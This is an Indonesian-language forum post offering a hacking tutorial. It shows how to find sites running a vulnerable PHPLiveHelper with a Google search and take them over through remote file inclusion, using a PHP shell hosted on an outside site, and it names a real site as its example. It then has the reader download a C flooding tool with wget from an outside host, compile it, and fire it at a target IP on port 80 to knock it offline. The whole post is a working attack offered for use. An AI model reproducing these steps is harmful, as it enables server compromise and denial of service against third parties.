== Toturial tembak IP target ==

View previous topic View next topic Go down

new == Toturial tembak IP target ==

Post  Tamu on Sun Sep 09, 2007 3:36 pm



Tutorial tembak IP Target



Pokonya kalo yang udah paham tulisan ini berarti lo udah bisa menginjek-injek Target, dan mengerti sedikit tentang pengalamatan IP Address. Karena kalau belum 'biasa' injek, pasti akan malu-malu dan gugup(xixixixixi) dan tentang Pengalamatan IP Address kalau ga tau sama sekali tentu target yang akan lo tembak ga' bakal disconnect atau down.
Nah, kalau udah bisa inject dan mengerti sedikit tentang pengalamatan IP, langsung dech...


0o0 Pertama-tama Lo harus punya server yang siap inject [Klo' blom punya cari aja di Google.
th3sn0wbr4in punya nich sedikit target dan Bug-bug yang 'Mudah-mudahan' masih bisa dipake di sini

0o0 Untuk contoh ini gw pake Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google Gw coba
allinurl:"/PHPLiveHelper/*.php"

0o0 Gw coba salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?
ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&livename=


0o0 Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&
livename=
dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadihttp://www.maldivesrds.com/phplivehelper/initiate.php?abs_path
=http://freewebs.com/th3sn0wbr4in/tusuk.htm?

0o0 Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), gapapa dech...

0o0 Cari Direktory yang bisa ditulis ama user nobody. Seperti biasa, ketik command linuxnya. Lo bisa ketik
find / -type d -perm 777 atau find / -type d -user nobody nah nanti banyak tuch yang keluar...
/* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi
777 (rwx) untuk siapapun, termasuk user nobody */
/* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody.
Karena pemilik Directory bisa melakukan apapun pada Directory miliknya */
Cari dibelakangnya ga' ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu
dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.

0o0 Download file untuk tembak dengan menggunakan wget. Ketik wget http://freewebs.com/th3sn0wbr4in/tembak.c.
Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download.
Ketik lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung.
Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :


--02:39:51--
http://freewebs.com/th3sn0wbr4in/tembak.c
=> `tembak.c'
Resolving freewebs.com... 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,744 [text/x-csrc]

0K ... 100% 30.89 KB/s

02:39:51 (30.89 KB/s) - `Sambit.c' saved [3764/3764]


Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya...
0o0 Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
tidak menggunakan Ekstensi).
Ketik gcc tembak.c -o tembak
Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output
file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera

0o0 Nah...sekarang, jalankan file tembak tadi. Ketik apa...?

0o0 ./tembak 219.83.4.68 80
0x01 ./ adalah Directory tempat kita menaruh file tembak
0x02 219.83.4.68 IP Warnet tempat gw maen
0x03 80 No Port. 80 untuk HTTP a.k.a Browsing
Untuk apa itu port. Stop tanya terus, buka Google! Cari yang ingin Lo cari!


Tamu
Guest


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum